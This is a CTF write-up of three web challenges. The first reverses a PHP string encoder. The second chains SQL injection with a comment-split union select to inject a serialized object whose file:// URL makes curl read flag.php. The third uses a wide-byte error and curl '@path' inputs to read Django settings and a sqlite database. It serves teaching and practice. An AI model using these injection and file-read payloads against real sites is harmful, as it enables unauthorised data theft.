CTF_Web: Attack and Defense World expert zone advanced questions WP (19-21)
2022-06-25 04:31:00 【AFCC_】
0x00 NSCTFweb2 solution (19)
Opening the challenge shows a piece of code and a hint that reversing it yields the flag. First, the code:
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
function encode($str){
    $_o=strrev($str);
    // echo $_o;
    for($_0=0;$_0<strlen($_o);$_0++){
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;
    }
    return str_rot13(strrev(base64_encode($_)));
}
highlight_file(__FILE__);
/*
Reverse the encryption algorithm; decrypting $miwen yields the flag.
*/
?>
The algorithm shows that the string we are given is str_rot13(strrev(base64_encode($_))), where $_ is built in the for loop by taking each character of the reversed input and adding 1 to its ASCII code. Every step is invertible, so we can undo them one by one in reverse order.
First, rot13-decode (rot13 is its own inverse).
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$miwen=str_rot13($miwen);
Then reverse the string and base64-decode it.
$miwen=strrev($miwen);
$miwen1 = base64_decode($miwen);
Then invert the for loop: wherever the encoder added 1, subtract 1. Finally, because $_=$_.$_c; concatenates the characters of the already-reversed input, reverse the string once more.
$_='';
for ($_0=0;$_0<strlen($miwen1);$_0++){
    $_c=substr($miwen1,$_0,1);
    $__=ord($_c)-1;
    $_c=chr($__);
    $_=$_.$_c;
}
echo strrev($_);
The result is the flag; submit it as-is.
The complete code:
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$miwen=str_rot13($miwen);   # rot13 decode
$miwen=strrev($miwen);      # reverse the string
$miwen1 = base64_decode($miwen);  # base64 decode
echo $miwen1."<br/>";
$_='';  # initialize $_ so the concatenation below does not use an undefined variable
for ($_0=0;$_0<strlen($miwen1);$_0++){
    $_c=substr($miwen1,$_0,1);
    $__=ord($_c)-1;   # subtract 1 from the ASCII code
    $_c=chr($__);     # convert back to a character
    $_=$_.$_c;        # append the character
}
echo strrev($_);  # reverse again
Running it gives:
The flag is:
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}
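As an added example (not the page's own code), the same algorithm and its inverse ported to Python, so the step-by-step reversal above can be checked as a round trip: decode(encode(x)) must equal x for any input, and decoding the challenge's $miwen must give the flag. It assumes ASCII input, as the challenge does.

```python
import base64
import codecs

# Ciphertext taken from the challenge source ($miwen on the page).
MIWEN = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"


def encode(plain: str) -> str:
    """Port of the challenge's encode(): reverse the input, add 1 to every
    byte, base64-encode, reverse, then rot13. Assumes ASCII input (a 0xFF
    byte would wrap to 0x00 in PHP's chr(), which this mirrors with & 0xFF)."""
    shifted = bytes((b + 1) & 0xFF for b in plain.encode()[::-1])
    b64 = base64.b64encode(shifted).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode(cipher: str) -> str:
    """Inverse of encode(): undo each step in the opposite order. rot13 and
    strrev are their own inverses, base64 has a decoder, and +1 becomes -1
    before the final reverse."""
    b64 = codecs.decode(cipher, "rot13")[::-1]
    shifted = base64.b64decode(b64)
    return bytes((b - 1) & 0xFF for b in shifted)[::-1].decode()


def solve() -> str:
    """Decode the challenge ciphertext; returns the flag string."""
    return decode(MIWEN)


if __name__ == "__main__":
    print(solve())
    # Round trip on lengths that are not a multiple of 3, so base64 padding
    # ('=') is exercised: it moves to the front after strrev, rot13 leaves it
    # untouched, and the second strrev puts it back where the decoder expects it.
    for sample in ("a", "ab", "flag{test}"):
        assert decode(encode(sample)) == sample
```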
0x01 Wangding Cup 2018 fakebook solution (20)
This is a combined challenge: first register and log in, then find an injection in the query page, and finally have a field value deserialized during the query to read a sensitive file.
The home page shows a blog system that displays each user's id, blog and so on.
After registering and logging in, the page shows:
The username is a link that queries all the information for that id, four fields in total. The URL is:
http://111.200.241.244:53591/view.php?no=1
Entering a single quote produces an error, which suggests an injection vulnerability.
Try to inject:
The injection point is numeric; no should be the id number.
So append order by directly after the parameter.
Testing shows 4 fields in total.
A union query returns an error: the phrase union select as a whole is filtered.
Bypass it with a comment between the two keywords:
-1%20union/**/select%201,2,3,4#
The echo position is now visible: username changed from 1 to 2, so the query result is echoed in position 2. Replace the 2 with the statements we want, using
-1%20union/**/select%201,database(),3,4#
-1%20union/**/select%201,user(),3,4#
-1%20union/**/select%201,(select%20group_concat(SCHEMA_NAME)%20from%20information_schema.SCHEMATA),3,4#
to query all database names, the current database and the current user. The results:
All databases are :
fakebook
information_schema
mysql
performance_schema
test
The current library is :fakebook
The current user is :[email protected]
Using
-1%20union/**/select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27fakebook%27),3,4#
shows that the only table in the fakebook library is users.
Using
-1%20union/**/select%201,(select%20group_concat(COLUMN_NAME)%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=%27fakebook%27%20and%20TABLE_NAME=%27users%27),3,4#
the columns of the table are:
no
username
passwd
data
There is no flag column; of course, if there were, the challenge would be far too basic.
Now the second part: source auditing. robots.txt reveals a backup of user.php; download and inspect it:
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
The code has no deserialization bypasses or POP chain to speak of; the only vulnerability is an SSRF where the blog URL is fetched, and curl_exec can be made to include local files. Through the injection we find that the data column holds a serialized string:
-1%20union/**/select%201,(select%20data%20from%20users%20where%201=1),3,4#
The returned data is:
and the error message shows that deserialization failed.
Putting the queried data in position 4 instead returns a normal page. In other words, the serialized string in position 4 is deserialized and its fields are shown in the first 3 positions, so we need to construct a serialized string that reads the file we want.
Construct a serialized string that reads /var/www/html/flag.php:
O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
Pass it in position 4 so that our string is deserialized and the file is read.
Final payload:
no=-11%20union/**/SELECT%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:1:%221%22;s:3:%22age%22;i:1;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27#
The returned page:
which gives the flag:
flag{c1e552fdf77049fabf65168f22f7aeab}
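As an added example (not the challenge's code), the UserInfo serialization above built programmatically, so the s:N byte lengths that are easy to miscount by hand come out right, together with a port of the leaked isValidBlog() regex. The regex rejects a file:// URL, which is exactly why the stored object bypasses it: the value never went through the validator. safe_to_fetch() is an added defensive check, assumed here and not in the original code, that re-validates the value read back from the database before it reaches curl_exec().

```python
import re

# Regex copied from isValidBlog() in the leaked user.php (PCRE -> Python re).
BLOG_RE = re.compile(
    r"^(((http(s?))://)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(:[0-9]+)?(/\S*)?$",
    re.IGNORECASE,
)


def php_str(s: str) -> str:
    """PHP serialize() form of a string: s:<len>:"<s>"; where <len> is the
    UTF-8 byte length, not the character count (the usual hand-counting slip)."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def serialize_userinfo(name: str, age: int, blog: str) -> str:
    """serialize() output for a UserInfo object with its three public
    properties in declaration order: name, age (integer), blog."""
    body = (php_str("name") + php_str(name)
            + php_str("age") + f"i:{int(age)};"
            + php_str("blog") + php_str(blog))
    return 'O:8:"UserInfo":3:{' + body + "}"


def is_valid_blog(blog: str) -> bool:
    """Port of isValidBlog(): only host-style URLs (optionally http/https) pass."""
    return BLOG_RE.match(blog) is not None


def safe_to_fetch(blog: str) -> bool:
    """Added check (hypothetical, not in the challenge): run on the value that
    comes back from the database, not only at registration. An object written
    straight into the data column never met the constructor or validator, so it
    must be re-validated, and the scheme pinned to http(s), before curl_exec()."""
    return is_valid_blog(blog) and blog.lower().startswith(("http://", "https://"))


if __name__ == "__main__":
    print(serialize_userinfo("1", 1, "file:///var/www/html/flag.php"))
    print(is_valid_blog("file:///var/www/html/flag.php"))   # False: validator rejects it
    print(safe_to_fetch("https://example.com/blog"))        # True
```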
0x02 WHCTF-2017 CAT solution (21)
Opening this challenge asks for a domain name. Trying baidu.com gives no response,
but the URL changed: a url= parameter now controls the input.
Trying 127.0.0.1 reveals that it is a ping command which returns the execution result.
But splitting commands with | (pipe) or ; (semicolon) does not work; both are filtered.
There is no special trick to this challenge, and the writeups from others are also fairly simple: the idea is to make the backend framework throw an error and find the answer in the error message. First, fuzz the filtered characters; it turns out only @ survives. Then input outside the ASCII range makes the framework error out. A wide byte is used here: submitting %bf returns an error page.
The error message shows that the Python path is /opt/api and that a gbk decoding error occurred while processing the input; the request cannot proceed.
The Python site uses the Django framework, which keeps its configuration in settings.py in the working directory. The knowledge point here is PHP curl: a value starting with @ followed by a full path makes curl send that file, which exposes sensitive information. First use
@/opt/api/api/settings.py
to get the database configuration. In fact, the wide-byte error earlier already contained a section of settings with the database information printed out, so we can go straight to the database.
Then use
@/opt/api/database.sqlite3
and find the flag in the error message.
The flag is:
WHCTF{[email protected]}